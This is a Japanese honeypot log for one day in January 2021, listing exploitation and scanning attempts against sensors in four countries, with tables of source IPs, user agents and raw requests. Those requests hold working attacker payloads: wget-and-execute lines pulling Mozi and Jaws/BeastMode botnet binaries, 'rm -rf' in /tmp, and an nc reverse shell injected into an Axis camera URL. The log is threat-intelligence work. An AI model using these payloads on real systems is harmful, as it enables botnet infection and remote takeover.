ハニーポット(仮) 観測記録 2021/01/20分です。
特徴
Location:JP
Axis製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Netis WF2419の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Linux Gnuによるスキャン行為
zgrabによるスキャン行為
ZmEuによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 192.210.239.115/beastmode/b3astmode.arm7; chmod 777 /tmp/b3astmode.arm7; sh /tmp/b3astmode.arm7 BeastMode.Rep.Jaws
Location:US
Axis製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Linux Gnuによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget debes.venus.lol/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget http[:]//178[.]141[.]0[.]203:59041/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget http[:]//1[.]1[.]188[.]22:55695/Mozi.a; chmod 777 Mozi.a tmp/Mozi.a jaws
Location:UK
Axis製品の脆弱性を狙うアクセス
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Linux Gnuによるスキャン行為
TBI-WebScannerによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, Worldであるアクセス
Gh0stRATのような動き
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget debes.venus.lol/jaws; sh /tmp/jaws
Location:SG
Axis製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
l9tcpidによるスキャン行為
zgrabによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:95 (前日比:+68)
US:総アクセス数:251 (前日比:+193)
UK:総アクセス数:156 (前日比:+110)
SG:総アクセス数:57 (前日比:-4)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 1.202.112.181 | China |
| 3 | 5.253.26.142 | Iran |
| 1 | 14.29.254.1 | China |
| 3 | 36.154.241.126 | China |
| 20 | 45.155.205.108 | Russia |
| 1 | 51.105.58.200 | United Kingdom |
| 2 | 52.240.55.71 | United States |
| 2 | 59.36.132.222 | China |
| 4 | 71.6.199.23 | United States |
| 2 | 89.248.168.108 | United Kingdom |
| 2 | 89.248.170.31 | United Kingdom |
| 3 | 106.52.65.184 | China |
| 1 | 111.224.248.244 | China |
| 3 | 118.25.157.33 | China |
| 1 | 119.118.12.136 | China |
| 1 | 150.255.33.134 | China |
| 3 | 159.138.34.196 | Singapore |
| 1 | 167.172.168.195 | United States |
| 1 | 172.93.102.236 | United States |
| 1 | 172.104.242.173 | United States |
| 1 | 182.119.166.53 | China |
| 1 | 182.138.137.171 | China |
| 1 | 182.138.137.240 | China |
| 1 | 182.242.104.29 | China |
| 1 | 185.239.242.162 | Netherlands |
| 24 | 188.165.169.140 | France |
| 1 | 192.241.224.135 | United States |
| 1 | 199.19.225.16 | United States |
| 1 | 199.59.60.226 | United States |
| 1 | 202.164.138.30 | India |
| 2 | 209.141.58.184 | United States |
| 1 | 209.141.60.195 | United States |
| 1 | 219.143.174.59 | China |
| 1 | 221.213.75.136 | China |
| 1 | 222.79.48.98 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 26 | - |
| 1 | Hello, world |
| 1 | Linux Gnu |
| 2 | Mozilla 5/0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 5 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
| 20 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
| 26 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | Mozilla/5.01715179 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 OPR/55.0.2994.44 |
| 4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
| 2 | ZmEu |
| 1 | curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0zlib/1.2.3 libidn/1.18 libssh2/1.2.2 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
| 1 | CONNECT | cn[.]bing[.]com/:443 | HTTP/1.1 |
| 2 | CONNECT | www[.]baidu[.]com/:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]ipip[.]net/:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]voanews[.]com/:443 | HTTP/1.1 |
| 9 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /0bef | HTTP/1.0 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /ReportServer | HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
| 1 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 2 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/p;nc%20-w%205%2089.248.170.31%209772%200%3C/tmp/p | /bin/sh%3E/tmp/p%202%3E/tmp/p;rm%20/tmp/p%22%20--%3e|HTTP/1.0\n |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 5 | GET | /jenkins/login | HTTP/1.0 |
| 5 | GET | /login | HTTP/1.0 |
| 5 | GET | /manager/html | HTTP/1.0 |
| 1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 6 | GET | /public/.env | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+192.210.239.115/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 6 | GET | /storage/.env | HTTP/1.1 |
| 6 | GET | /vendor/.env | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/phpunit.xml | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | http[:]//boxun[.]com/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]123cha[.]com/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]baidu[.]com/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]minghui[.]org/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]rfa[.]org/english/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]wujieliulan[.]com/ | HTTP/1.1 |
| 3 | HEAD | / | HTTP/1.0 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | HEAD | http[:]//110[.]242[.]68[.]4/ | HTTP/1.1 |
| 2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /cgi-bin-igd/netcore_set.cgi | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 1.1.188.22 | Thailand |
| 101 | 5.147.179.94 | Germany |
| 1 | 27.194.114.247 | China |
| 3 | 34.78.39.219 | United States |
| 1 | 42.194.162.161 | China |
| 10 | 45.155.205.108 | Russia |
| 4 | 66.240.236.119 | United States |
| 1 | 75.121.134.193 | United States |
| 4 | 89.248.168.108 | United Kingdom |
| 2 | 89.248.170.31 | United Kingdom |
| 1 | 107.175.70.150 | United States |
| 3 | 113.107.244.3 | China |
| 101 | 116.59.26.211 | Taiwan |
| 3 | 122.227.169.98 | China |
| 1 | 125.47.56.151 | China |
| 1 | 125.47.74.193 | China |
| 1 | 152.32.187.22 | Hong Kong |
| 1 | 161.35.131.93 | United States |
| 1 | 172.93.102.236 | United States |
| 1 | 172.104.242.173 | United States |
| 1 | 172.105.89.161 | United States |
| 1 | 178.141.0.203 | Russia |
| 2 | 185.239.242.162 | Netherlands |
| 1 | 186.33.122.123 | Dominican Republic |
| 2 | 209.141.60.195 | United States |
| 1 | 213.202.233.56 | Germany |
| 1 | 222.137.25.0 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 31 | - |
| 2 | Hello, world |
| 1 | Linux Gnu |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 202 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 | ||
| 2 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
| 1 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /0bef | HTTP/1.0 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
| 3 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/p;nc%20-w%205%2089.248.170.31%209772%200%3C/tmp/p | /bin/sh%3E/tmp/p%202%3E/tmp/p;rm%20/tmp/p%22%20--%3e|HTTP/1.0 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 3 | GET | /jenkins/login | HTTP/1.0 |
| 3 | GET | /login | HTTP/1.0 |
| 3 | GET | /manager/html | HTTP/1.0 |
| 2 | GET | /manager/html/ | HTTP/1.0 |
| 202 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws | |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//178[.]141[.]0[.]203:59041/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//1[.]1[.]188[.]22:55695/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 6 | HEAD | / | HTTP/1.0 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 2 | POST | /HNAP1/ | HTTP/1.0 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 34.210.46.78 | United States |
| 20 | 45.155.205.108 | Russia |
| 1 | 46.166.139.111 | Netherlands |
| 1 | 47.110.241.10 | China |
| 1 | 60.191.125.35 | China |
| 2 | 66.240.205.34 | United States |
| 6 | 77.247.181.162 | Netherlands |
| 4 | 83.97.20.29 | Romania |
| 3 | 89.248.168.108 | United Kingdom |
| 2 | 89.248.170.31 | United Kingdom |
| 101 | 91.54.237.71 | Germany |
| 1 | 122.228.19.79 | China |
| 3 | 159.89.197.91 | United States |
| 1 | 161.35.131.93 | United States |
| 1 | 173.243.70.128 | United States |
| 1 | 185.239.242.162 | Netherlands |
| 1 | 192.241.213.56 | United States |
| 1 | 202.164.138.205 | India |
| 2 | 209.141.60.195 | United States |
| 1 | 223.149.0.77 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 17 | - |
| 1 | Go-http-client/1.1 |
| 2 | Hello, World |
| 1 | Linux Gnu |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:83.0) Gecko/20100101 Firefox/83.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 20 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 6 | TBI-WebScanner/0.0.1 (+https://leakix.net/) |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | Gh0st\xad | ||
| 1 | CONNECT | leakix[.]net/:443 | HTTP/1.1 |
| 1 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /ReportServer | HTTP/1.1 |
| 1 | GET | /composer.json | HTTP/1.1 |
| 1 | GET | /composer.lock | HTTP/1.1 |
| 3 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 2 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /debug/default/view?panel=config | HTTP/1.1 |
| 2 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /frontend_dev.php/$ | HTTP/1.1 |
| 1 | GET | /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/p;nc%20-w%205%2089.248.170.31%209772%200%3C/tmp/p | /bin/sh%3E/tmp/p%202%3E/tmp/p;rm%20/tmp/p%22%20--%3e|HTTP/1.0 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 2 | GET | /jenkins/login | HTTP/1.0 |
| 2 | GET | /login | HTTP/1.0 |
| 2 | GET | /manager/html | HTTP/1.0 |
| 1 | GET | /manager/html/ | HTTP/1.1 |
| 101 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws | |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 5 | HEAD | / | HTTP/1.0 |
| 1 | HEAD | http[:]//112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
| 1 | OPTIONS | / | HTTP/1.0 |
| 1 | OPTIONS | / | RTSP/1.0 |
| 2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 3 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 39.108.236.15 | China |
| 20 | 45.155.205.108 | Russia |
| 3 | 54.80.119.156 | United States |
| 3 | 89.248.168.108 | United Kingdom |
| 1 | 89.248.170.31 | United Kingdom |
| 1 | 94.232.47.160 | Russia |
| 1 | 103.66.79.49 | India |
| 1 | 115.58.139.213 | China |
| 3 | 119.45.195.247 | China |
| 3 | 121.4.96.162 | China |
| 3 | 150.223.5.81 | China |
| 2 | 167.71.13.196 | United States |
| 1 | 167.172.168.195 | United States |
| 1 | 172.93.102.236 | United States |
| 1 | 172.104.242.173 | United States |
| 1 | 185.239.242.162 | Netherlands |
| 1 | 192.241.220.219 | United States |
| 1 | 196.64.240.178 | Morocco |
| 4 | 209.141.58.184 | United States |
| 2 | 209.141.60.195 | United States |
| 3 | 221.234.36.70 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 27 | - |
| 20 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 4 | ZmEu |
| 1 | l9tcpid/0.4.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 | ||
| 1 | \x16\x03\x01 | ||
| 1 | GET | /.env | HTTP/1.1 |
| 1 | GET | /0bef | HTTP/1.0 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /ReportServer | HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
| 1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
| 1 | GET | /config.json | HTTP/1.1 |
| 2 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 2 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/p;nc%20-w%205%2089.248.170.31%209772%200%3C/tmp/p | /bin/sh%3E/tmp/p%202%3E/tmp/p;rm%20/tmp/p%22%20--%3e|HTTP/1.0 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 5 | GET | /jenkins/login | HTTP/1.0 |
| 6 | GET | /login | HTTP/1.0 |
| 5 | GET | /manager/html | HTTP/1.0 |
| 2 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 4 | HEAD | / | HTTP/1.0 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
